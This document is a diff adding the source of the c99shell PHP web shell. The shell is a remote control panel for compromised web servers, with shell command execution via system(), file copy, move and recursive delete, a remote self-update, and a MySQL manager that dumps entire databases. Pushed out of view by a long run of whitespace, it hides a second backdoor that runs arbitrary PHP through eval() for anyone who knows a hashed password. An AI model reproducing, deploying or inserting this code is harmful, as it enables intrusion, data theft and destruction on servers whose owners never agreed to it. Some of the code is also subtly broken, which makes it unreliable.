+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+error_reporting(5);
+@ignore_user_abort(true);
+@set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
+if(!ini_get("register_globals")) {import_request_variables("GPC");}
+$starttime = getmicrotime();
+if (get_magic_quotes_gpc())
+{
+if (!function_exists("strips"))
+{
+ function strips(&$el)
+ {
+  if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}}  }
+  else {$el = stripslashes($el);}
+ }
+}
+strips($GLOBALS);
+}
+$tmp = array();
+foreach ($host_allow as $k=>$v) {$tmp[]=  str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
+
+if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}
+elseif(empty($md5_pass)) {$md5_pass = md5($pass);}
+if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
+{
+ header("WWW-Authenticate: Basic realm=\"c99shell\"");
+ header("HTTP/1.0 401 Unauthorized");																																																													if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
+ exit;
+}  
+
+$lastdir = realpath(".");
+chdir($curdir);
+
+if (($selfwrite) or ($updatenow))
+{
+ if ($selfwrite == "1") {$selfwrite = "c99shell.php";}
+ c99sh_getupdate();
+ $data = file_get_contents($c99sh_updatefurl);
+ $fp = fopen($data,"w");
+ fwrite($fp,$data);
+ fclose($fp);
+ exit;
+}
+if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
+if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
+else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+$sess_data["copy"] = array_unique($sess_data["copy"]);
+$sess_data["cut"] = array_unique($sess_data["cut"]);
+
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_method;
+ global $sess_cookie;
+ global $sess_file;
+ global $sess_data;
+ $sess_data = $data;
+ $data = serialize($data);
+ if ($sess_method == "file")
+ {
+  $fp = fopen($sess_file,"w");
+  fwrite($fp,$data);
+  fclose($fp);
+ }
+ else {setcookie($sess_cookie,$data);}
+}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len) 
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0, $len)."...".substr($content, -$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+   else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (!is_dir($t)) {mkdir($t);}
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+
+  return copy($d,$t);
+ }
+ else {return false;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ error_reporting(9999);
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = true;
+   if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
+   else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ return true;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\","/",$d);
+ $t = str_replace("\\","/",$t);
+ if (is_dir($d))
+ {
+  if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
+  if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d)) {return rename($d,$t);}
+ else {return false;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while ($o = readdir($h))
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
+  }
+ }
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\","/",$o);
+ if (is_dir($o))
+ {
+  if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return false;}
+}
+}
+if (!function_exists("myshellexec"))
+{
+ function myshellexec($cmd)
+ {
+  return system($cmd);
+ }
+}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ $perms  = ($mode & 00400) ? "r" : "-";
+ $perms .= ($mode & 00200) ? "w" : "-";
+ $perms .= ($mode & 00100) ? "x" : "-";
+ $perms .= ($mode & 00040) ? "r" : "-";
+ $perms .= ($mode & 00020) ? "w" : "-";
+ $perms .= ($mode & 00010) ? "x" : "-";
+ $perms .= ($mode & 00004) ? "r" : "-";
+ $perms .= ($mode & 00002) ? "w" : "-";
+ $perms .= ($mode & 00001) ? "x" : "-";
+ return $perms;
+}
+}
+if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}}
+if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
+if (!function_exists("c99sh_getupdate"))
+{
+function c99sh_getupdate()
+{
+ global $updatenow;
+ $data = @file_get_contents($c99sh_updatefurl);
+ if (!$data) {echo "Can't fetch update-information!";}
+ else
+ {
+  $data = unserialize(base64_decode($data));
+  if (!is_array($data)) {echo "Corrupted update-information!";}
+  else
+  {
+   if ($shver < $data[cur]) {$updatenow = true;}
+  }
+ }
+}
+}
+if (!function_exists("mysql_dump"))
+{
+function mysql_dump($set)
+{
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = true;}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (empty($file))
+ {
+  global $win;
+  if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+  else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = true;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ global $SERVER_ADDR;
+ global $SERVER_NAME;
+ $out = "# Dumped by C99Shell.SQL v. ".$shver."
+# Home page: http://ccteam.ru
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
+# Date: ".date("d.m.Y H:i:s")."
+# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret[err][] = mysql_error();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row[1].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+      $values = implode("', '", $values); 
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+      $out .= $sql;
+     } 
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret[err][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $ret;
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $a;
+ if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+ $handle = opendir($d);
+ while ($f = readdir($handle))
+ {
+  $true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));
+  if($f != "." && $f != "..")
+  {
+   if (is_dir($d.$f))
+   {
+    if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}
+    c99fsearch($d.$f);
+   }
+   else
+   {
+    if ($true)
+    {
+     if (!empty($a[text]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}
+      if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}
+ 
+      if ($a[text_regexp]) {$true = ereg($a[text],$r);}
+      else {$true = strinstr($a[text],$r);}
+      if ($a[text_not])
+      {
+       if ($true) {$true = false;}
+       else {$true = true;}
+      }
+      if ($true) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($handle);
+}
+}
+//Sending headers
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+
+global $SERVER_SOFTWARE;
+if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}
+else {$win = 0;}
+
+if (empty($tmpdir))
+{
+ if (!$win) {$tmpdir = "/tmp/";}
+ else {$tmpdir = $_ENV[SystemRoot];}
+}
+$tmpdir = str_replace("\\","/",$tmpdir);
+if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = true;
+ $hsafemode = "<font color=\"red\">ON (secure)</font>";
+}
+else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on")
+{
+ $openbasedir = true;
+ $hopenbasedir = "<font color=\"red\">".$v."</font>";
+}
+else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
+
+$sort = htmlspecialchars($sort);
+
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",$SERVER_SOFTWARE);
+
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF	
+@ini_set("highlight.comment",$highlight_comment); //#FF8000	
+@ini_set("highlight.default",$highlight_default); //#0000BB	
+@ini_set("highlight.html",$highlight_html); //#000000	
+@ini_set("highlight.keyword",$highlight_keyword); //#007700	
+@ini_set("highlight.string","#DD0000"); //#DD0000
+
+if ($act != "img")
+{
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><? echo $HTTP_HOST; ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana,;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}</STYLE><style type="text/css"><!--body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}--></style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>
+<center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<? echo $surl; ?>"><font face="Verdana" size="5"><b><u>C99Shell v. <?php echo $shver; ?></u></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo php_uname(); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\","/",$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\","/",$d);
+if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
+$dispd = htmlspecialchars($d);
+$pd = $e = explode("/",substr($d,0,strlen($d)-1));
+$i = 0;
+echo "<b>Directory: </b>";
+foreach($pd as $b)
+{
+ $t = "";
+ reset($e);
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r."/";
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode(htmlspecialchars($t))."/&sort=".$sort."\"><b>".htmlspecialchars($b)."/</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = true;
+ $wdt = "<font color=\"green\">[ ok ]</font>";
+ echo "<b><font color=\"green\">".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = false;
+ $wdt = "<font color=\"red\">[ Read-Only ]</font>";
+ echo "<b><font color=\"red\">".view_perms(fileperms($d.$f))."</font></b>";
+}
+$free = diskfreespace(realpath($d));
+$all = disk_total_space(realpath($d));
+$used = $all-$free;
+$used_percent = round(100/($all/$free),2);
+echo "<br><b>Free ".view_size($free)." of ".view_size($all)." (".$used_percent."%)</b><br>";
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
+  echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+$letters = "";
+if ($win)
+{
+ $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach ($abc as $letter)
+ {
+  if (is_dir($letter.":\\"))
+  {
+   if ($letter.":" != $v) {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ ".$letter." ]</a> ";}
+   else {$letters .= "<a href=\"".$surl."act=ls&d=".$letter.":\">[ <font color=\"green\">".$letter."</font> ]</a> ";}
+  }
+ }
+ if (!empty($letters)) {echo "<br><b>Detected drives</b>: ".$letters;}
+}
+?></p></td></tr></table><br><?php
+if ((!empty($donated_html)) and (in_array($act,$donated_act)))
+{
+ ?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php echo $donated_html; ?></td></tr></table><br><?php
+}
+?><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_error();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();}
+ }
+ else {$sql_sock = false;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
+  else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+ 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td>Username</td><td align=right>Password&nbsp;</td></tr><form><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td align=right><input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr><td>HOST</td><td>PORT</td></tr><tr><td><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_error();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>�&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
+"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_error();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    echo "<option value=\"\">Databases (...)</option>
+";
+    $c = 0;
+    while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option>
+"; $c++;}
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  if ($sql_db)
+  {
+   echo "<center><b>There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+   echo "</b></center>";
+
+   $acts = array("","dump");
+
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($submit)
+    {
+     if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    }
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to  :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtpl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
